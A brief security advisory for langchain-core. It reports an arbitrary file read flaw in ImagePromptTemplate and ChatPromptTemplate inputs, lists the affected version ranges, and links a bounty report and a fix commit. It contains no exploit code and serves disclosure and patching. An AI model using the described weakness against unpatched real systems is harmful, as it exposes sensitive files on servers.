A vulnerability in langchain-core versions >=0.1.17,<0.1.53, >=0.2.0,<0.2.43, and >=0.3.0,<0.3.15 allows unauthorized users to read arbitrary files from the host file system. The issue arises from the ability to create langchain_core.prompts.ImagePromptTemplate's (and by extension langchain_core.prompts.ChatPromptTemplate's) with input variables that can read any user-specified path from the server file system. If the outputs of these prompt templates are exposed to the user, either directly or through downstream model outputs, it can lead to the exposure of sensitive information.
https://huntr.com/bounties/be1ee1cb-2147-4ff4-a57b-b6045271cf27
https://github.com/langchain-ai/langchain/commit/c1e742347f9701aadba8920e4d1f79a636e50b68